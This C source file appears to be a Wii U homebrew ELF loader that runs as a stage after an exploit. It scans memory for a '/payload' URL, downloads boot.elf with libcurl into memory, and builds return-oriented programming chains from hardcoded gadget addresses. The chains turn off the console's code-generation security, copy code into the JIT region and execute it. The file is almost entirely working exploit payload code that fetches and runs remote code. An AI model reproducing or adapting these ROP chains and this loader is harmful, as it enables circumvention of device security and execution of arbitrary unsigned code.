#include "loader.h"

#define OSTHREAD_SIZE	0x1000

void catch() {
	if (*(uint32_t*)0xF5FFFFEC == 0) { //Have we started running the program
		_start();
	} else {
		ropend();
		load_elf_image();
	}
}
void _start() {
	/* Get a safer stack */
	asm(
		"lis %r1, 0x1ab5 ;"
		"ori %r1, %r1, 0xd138 ;"
	);
	/* Get coreinit handle and keep it in memory */
	OSDynLoad_Acquire("coreinit",(uint32_t*)0xF5FFFFEC);
	uint32_t coreinit_handle = * (uint32_t*)0xF5FFFFEC;

	void*(*OSAllocFromSystem)(uint32_t size, int align);
	void(*OSFreeToSystem)(void *ptr);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
	
	/* Get functions to send restart signal */
	int(*IM_Open)(void);
	int(*IM_SetDeviceState)(int fd, void *mem, int state, int a, int b);
	int(*IM_Close)(int fd);
	OSDynLoad_FindExport(coreinit_handle, 0, "IM_Open", &IM_Open);
	OSDynLoad_FindExport(coreinit_handle, 0, "IM_SetDeviceState", &IM_SetDeviceState);
	OSDynLoad_FindExport(coreinit_handle, 0, "IM_Close", &IM_Close);
	
	/* Send restart signal to get rid of unneded threads */
	int fd = IM_Open();
	void *mem = OSAllocFromSystem(0x100, 64);
	memset(mem, 0, 0x100);
	IM_SetDeviceState(fd, mem, 3, 0, 0);
	OSFreeToSystem(mem); 
	IM_Close(fd);

	/* Wait for threads to exit */
	unsigned int time = 0x1FFFFFFF;
	while(time--) ;
	
	/* Prepare for thread startups */
	int (*OSCreateThread)(void *thread, void *entry, int argc, void *args, uint32_t stack,
		uint32_t stack_size, int priority, uint16_t attr);
	int (*OSResumeThread)(void *thread);
	int (*OSIsThreadTerminated)(void *thread);

	OSDynLoad_FindExport(coreinit_handle, 0, "OSCreateThread", &OSCreateThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSResumeThread", &OSResumeThread);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSIsThreadTerminated", &OSIsThreadTerminated);

	/* Allocate a stack for the thread */
	/* IMPORTANT: libcurl uses around 0x1000 internally so make sure to allocate more*
		for the stack to avoid crashes *0x200 isn't enough */
	void *stack = OSAllocFromSystem(0x1800, 0x10);

	/* Create the thread */
	void *thread = OSAllocFromSystem(OSTHREAD_SIZE, 8);
	//current thread is broken, switch to a working one in core 1
	int ret = OSCreateThread(thread, main_thread, 0, (void*) 0, (uint32_t)stack + 0x1800, 0x1800, 0, 0x1A);
	if (!ret) OSFatal("Failed to create thread");
	
	/* Schedule it for execution */
	OSResumeThread(thread);
	
	while(!OSIsThreadTerminated(thread)) ; //Keep this thread alive  to do some final stuff

	/* Make sure we actually have a ELF */
	if(valid_elf_image() != 1)
		OSFatal("elf image isn't valid");

	*(int*)0xF5FFFFFC = 0;
	/* Make a copy of our code to reuse */
	backup_code(); //This will copy us to end of JIT then we jump to catch()
}
/* libcurl data write callback */
static int curl_write_data_callback(void *buffer, int size, int nmemb, void *userp) {
	int *filepos = (int*)0xF5FFFFFC;
	int insize = size * nmemb;
	if((*filepos) + insize > 0x7FFFFC)
		OSFatal("Tried to load too big of an ELF");
	memcpy((void*)0xF5800000 + (*filepos), buffer, insize);
	(*filepos) += insize;
	return insize;
}

#define CURLOPT_URL 10002
#define CURLOPT_WRITEFUNCTION 20011
#define CURLINFO_RESPONSE_CODE 0x200002

static int curl_download_file(void *curl, char *url) {
	uint32_t libcurl_handle;
	OSDynLoad_Acquire("nlibcurl", &libcurl_handle);
	void (*curl_easy_setopt) (void *handle, uint32_t param, void *op);
	int  (*curl_easy_perform)(void *handle);
	void (*curl_easy_getinfo)(void *handle, uint32_t param, void *info);
	OSDynLoad_FindExport(libcurl_handle, 0, "curl_easy_setopt", &curl_easy_setopt);
	OSDynLoad_FindExport(libcurl_handle, 0, "curl_easy_perform", &curl_easy_perform);
	OSDynLoad_FindExport(libcurl_handle, 0, "curl_easy_getinfo", &curl_easy_getinfo);
    curl_easy_setopt(curl, CURLOPT_URL, url); //Setup parameters for file
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, curl_write_data_callback);

	int ret = curl_easy_perform(curl); //Actually download the file
	if (ret) OSFatal("curl_easy_perform returned an error");

	int resp = 404;
	curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &resp);
	if(resp != 200) OSFatal("curl_easy_getinfo returned an HTTP error");
}

#define CURL_GLOBAL_SSL (1<<0)
#define CURL_GLOBAL_WIN32 (1<<1)
#define CURL_GLOBAL_ALL (CURL_GLOBAL_SSL|CURL_GLOBAL_WIN32)
#define CURL_GLOBAL_NOTHING 0
#define CURL_GLOBAL_DEFAULT CURL_GLOBAL_ALL

static void main_thread(int argc, void *argv) {
	uint32_t coreinit_handle = * (uint32_t*)0xF5FFFFEC;
	char* leaddr = (char*)0;
	char* str, url[64];
	
	/* Search for URL to acquire ELF */
	for (str = (char*)0x1A000000; str < (char*)0x20000000; str++) {
		/* Search for /payload which we use to find the URL */
		if(*(uint32_t*)str == 0x2F706179 && *(uint32_t*)(str + 4) == 0x6C6F6164) {
			leaddr = str;
			while(*leaddr) leaddr--;
			leaddr++;
			/* If string starts with http its likely to be correct */
			if(*(uint32_t*)leaddr == 0x68747470)
				break;
			leaddr = (char*)0;
		}
	}
	if(leaddr == (char*)0)
		OSFatal("Unable to find usable URL");

	/* Generate the boot.elf address */
	memcpy(url, leaddr, 64);
	char *ptr = url;
	while(*ptr) ptr++;
	while(*ptr != 0x2F) ptr--;
	memcpy(ptr + 1, "boot.elf", 9);

	/* also fix our internet issues, hopefully */
    uint32_t nn_ac_handle, nsysnet_handle, libcurl_handle, nn_startupid;
    OSDynLoad_Acquire("nn_ac.rpl", &nn_ac_handle);
    OSDynLoad_Acquire("nsysnet", &nsysnet_handle);
	OSDynLoad_Acquire("nlibcurl", &libcurl_handle);

    int  (*ACInitialize)(void);
    int  (*ACGetStartupId)(uint32_t *id);
    int  (*ACConnectWithConfigId)(uint32_t id);
	int  (*socket_lib_init)(void);
    int  (*curl_global_init)(int opts);
	void*(*curl_easy_init)(void);
	void (*curl_easy_cleanup)(void *handle);

    OSDynLoad_FindExport(nn_ac_handle, 0, "ACInitialize", &ACInitialize);
    OSDynLoad_FindExport(nn_ac_handle, 0, "ACGetStartupId", &ACGetStartupId);   
    OSDynLoad_FindExport(nn_ac_handle, 0, "ACConnectWithConfigId",&ACConnectWithConfigId);
    OSDynLoad_FindExport(nsysnet_handle, 0, "socket_lib_init", &socket_lib_init);
    OSDynLoad_FindExport(libcurl_handle, 0, "curl_global_init", &curl_global_init);
	OSDynLoad_FindExport(libcurl_handle, 0, "curl_easy_init", &curl_easy_init);
	OSDynLoad_FindExport(libcurl_handle, 0, "curl_easy_cleanup", &curl_easy_cleanup);

    ACInitialize();
    ACGetStartupId(&nn_startupid);
    ACConnectWithConfigId(nn_startupid);
    socket_lib_init();
	curl_global_init(CURL_GLOBAL_ALL);
	
	void *curl_handle = curl_easy_init();
	if(!curl_handle) OSFatal("cURL not initialized");
	curl_download_file(curl_handle, url);
	curl_easy_cleanup(curl_handle);

	/* Release libcurl and exit thread */
	void (*OSDynLoad_Release)(uint32_t handle);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSDynLoad_Release", &OSDynLoad_Release);
	OSDynLoad_Release(libcurl_handle);
}

void* memcpy(void *dst, const void *src, uint32_t len) {
	const uint8_t *src_ptr = (const uint8_t *)src;
	uint8_t *dst_ptr = (uint8_t *)dst;

    while(len) {
		*dst_ptr++ = *src_ptr++;
		--len;
	}
}

void* memset(void *dst, int val, uint32_t bytes) {
	uint8_t *dst_ptr = (uint8_t *)dst;
	uint32_t i = 0;
	while(i < bytes) {
		dst_ptr[i] = val;
		++i;
	}
	return dst;
}
/* rop save */
void ropstart() {
	asm volatile(
		"lis %r3, 0xF600     ;"
		"stw %r1, -8(%r3)    ;" //Store the old Stack pointer so we can recover it
		"lis %r1, 0x1B00     ;"
		"lwz %r28, 0(%r1)    ;" //Load first function call
		"lis %r4, 0x0107     ;" //Run our first gadget
		"ori %r4, %r4, 0xDD70;"
		"mtlr %r4            ;"
		"blr                 ;"
	);
}
/* rop recover */
void ropend() {
	asm volatile(
		"lis %r3, 0xF600 ;"
		"lwz %r1, -8(%r3);"
	);
	load_elf_image();
}
void backup_code() { //Copy our code to the end of JIT so we can safely load in an ELF
	uint32_t coreinit_handle = * (uint32_t*)0xF5FFFFEC;
	void*(*OSAllocFromSystem)(uint32_t size, int align);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
	uint32_t *ropbuf = (uint32_t*)0x1B000000;
	memset(ropbuf, 0, 0x130);
	uint32_t ROP_CALLR28_POP_R28_TO_R31 = 0x0107DD70;
	uint32_t ROP_OSGetCurrentThread = 0x01043150;
	uint32_t ROP_OSSetThreadAffinity = 0x010429DC;
	uint32_t ROP_OSYieldThread = 0x010418E4;
	uint32_t ROP_OSSwitchSecCodeGenMode = 0x010376C0;
	uint32_t ROP_memcpy = 0x01035fc8; //We'll just use coreinit's one
	uint32_t ROP_DCFlushRange = 0x01023F88;
	uint32_t ROP_ICInvalidateRange = 0x010240B0;
	uint32_t ROP_Exit = 0x0101cd80;
	ropbuf[0x00/4] = ROP_OSGetCurrentThread;
	ropbuf[0x08/4] = ROP_OSSetThreadAffinity; //Set Thread Affinity after you get it since it's still in r3
	ropbuf[0x14/4] = 1; //Make sure Thread Affinity is on Core 1
	ropbuf[0x1C/4] = ROP_CALLR28_POP_R28_TO_R31; //Run next function
	ropbuf[0x20/4] = ROP_OSYieldThread;
	ropbuf[0x34/4] = ROP_CALLR28_POP_R28_TO_R31; //Run next function
	ropbuf[0x38/4] = ROP_OSSwitchSecCodeGenMode; //Setup for next call |
	ropbuf[0x4C/4] = 0x01023758; //Set r3 to 0 and call next function  v
	ropbuf[0x54/4] = 0; //Make sure r4 is zero and sanitized
	ropbuf[0x5C/4] = ROP_CALLR28_POP_R28_TO_R31; //Buffer at 0x1B000058
	ropbuf[0x6C/4] = 0x1B000110; //Setup r31 pointer for memcpy
	ropbuf[0x74/4] = 0x010F2858; //memcpy function as r0, start at 0x1B000070
	ropbuf[0x84/4] = 0x010E1AF8; //Next function after memcpy, r3 to 1, 0x1B000080
	ropbuf[0x90/4] = ROP_OSSwitchSecCodeGenMode; //Turn security back on
	ropbuf[0x9C/4] = 0; //Make sure r4 is zero and sanitized
	ropbuf[0xA4/4] = ROP_CALLR28_POP_R28_TO_R31; //Run security, 0x1B0000A0
	ropbuf[0xA8/4] = ROP_DCFlushRange; //Preload r28, next at 0x1B0000B8
	ropbuf[0xBC/4] = 0x01010414; //Load in r3 and r31->r4 for DCFlushRange and ICInvalidateRange
	ropbuf[0xC0/4] = 0x037E0000; //DCFlush this address
	ropbuf[0xCC/4] = 0x1FFFC;    //With this many bytes, 0x1B00000D0
	ropbuf[0xD4/4] = ROP_CALLR28_POP_R28_TO_R31; //Finally call DCFlushRange then we start over
	ropbuf[0xD8/4] = ROP_ICInvalidateRange; //Preload
	ropbuf[0xEC/4] = 0x01010414; //Now setup ICInvalidateRange, 0x1B0000E8
	ropbuf[0xF0/4] = 0x037E0000; //ICInvalidate this
	ropbuf[0xFC/4] = 0x1FFFC;    //This many bytes
	ropbuf[0x104/4] = ROP_CALLR28_POP_R28_TO_R31; //Run ICInvalidateRange, 0x1B000100
	ropbuf[0x11C/4] = 0x037E0000; //Now return control to catch();
	ropbuf[0x120/4] = 0x01800000; //r4 for memcpy, src, from JIT
	ropbuf[0x124/4] = 0x1FFFC;    //r5 for memcpy, size, 0x20000-1 bytes
	ropbuf[0x12C/4] = 0x037E0000; //r3 for memcpy, dst, copy to end of JIT
	ropstart();
}

void dorop(unsigned int dst, unsigned int src, int len) { //Copy a section into JIT and clean
	uint32_t coreinit_handle = * (uint32_t*)0xF5FFFFEC;
	void*(*OSAllocFromSystem)(uint32_t size, int align);
	OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
	uint32_t *ropbuf = (uint32_t*)0x1B000000;
	memset(ropbuf, 0, 0x130);
	uint32_t ROP_CALLR28_POP_R28_TO_R31 = 0x0107DD70;
	uint32_t ROP_OSGetCurrentThread = 0x01043150;
	uint32_t ROP_OSSetThreadAffinity = 0x010429DC;
	uint32_t ROP_OSYieldThread = 0x010418E4;
	uint32_t ROP_OSSwitchSecCodeGenMode = 0x010376C0;
	uint32_t ROP_memcpy = 0x01035fc8; //We'll just use coreinit's one
	uint32_t ROP_DCFlushRange = 0x01023F88;
	uint32_t ROP_ICInvalidateRange = 0x010240B0;
	uint32_t ROP_Exit = 0x0101cd80;
	ropbuf[0x00/4] = ROP_OSGetCurrentThread;
	ropbuf[0x08/4] = ROP_OSSetThreadAffinity; //Set Thread Affinity after you get it since it's still in r3
	ropbuf[0x14/4] = 1; //Make sure Thread Affinity is on Core 1
	ropbuf[0x1C/4] = ROP_CALLR28_POP_R28_TO_R31; //Run next function
	ropbuf[0x20/4] = ROP_OSYieldThread;
	ropbuf[0x34/4] = ROP_CALLR28_POP_R28_TO_R31; //Run next function
	ropbuf[0x38/4] = ROP_OSSwitchSecCodeGenMode; //Setup for next call |
	ropbuf[0x4C/4] = 0x01023758; //Set r3 to 0 and call next function  v
	ropbuf[0x54/4] = 0; //Make sure r4 is zero and sanitized
	ropbuf[0x5C/4] = ROP_CALLR28_POP_R28_TO_R31; //Buffer at 0x1B000058
	ropbuf[0x6C/4] = 0x1B000110; //Setup r31 pointer for memcpy
	ropbuf[0x74/4] = 0x010F2858; //memcpy function as r0, start at 0x1B000070
	ropbuf[0x84/4] = 0x010E1AF8; //Next function after memcpy, r3 to 1, 0x1B000080
	ropbuf[0x90/4] = ROP_OSSwitchSecCodeGenMode; //Turn security back on
	ropbuf[0x9C/4] = 0; //Make sure r4 is zero and sanitized
	ropbuf[0xA4/4] = ROP_CALLR28_POP_R28_TO_R31; //Run security, 0x1B0000A0
	ropbuf[0xA8/4] = ROP_DCFlushRange; //Preload r28, next at 0x1B0000B8
	ropbuf[0xBC/4] = 0x01010414; //Load in r3 and r31->r4 for DCFlushRange and ICInvalidateRange
	ropbuf[0xC0/4] = dst; //DCFlush this address
	ropbuf[0xCC/4] = len; //With this many bytes, 0x1B00000D0
	ropbuf[0xD4/4] = ROP_CALLR28_POP_R28_TO_R31; //Finally call DCFlushRange then we start over
	ropbuf[0xD8/4] = ROP_ICInvalidateRange; //Preload
	ropbuf[0xEC/4] = 0x01010414; //Now setup ICInvalidateRange, 0x1B0000E8
	ropbuf[0xF0/4] = dst; //ICInvalidate this
	ropbuf[0xFC/4] = len; //This many bytes
	ropbuf[0x104/4] = ROP_CALLR28_POP_R28_TO_R31; //Run ICInvalidateRange, 0x1B000100
	ropbuf[0x11C/4] = 0x037E0000; //Recover control to the program so we can call ropend()
	ropbuf[0x120/4] = src; //r4 for memcpy, src, from JIT
	ropbuf[0x124/4] = len; //r5 for memcpy, size, 0x20000-1 bytes
	ropbuf[0x12C/4] = dst; //r3 for memcpy, dst, copy to end of JIT
	ropstart();
}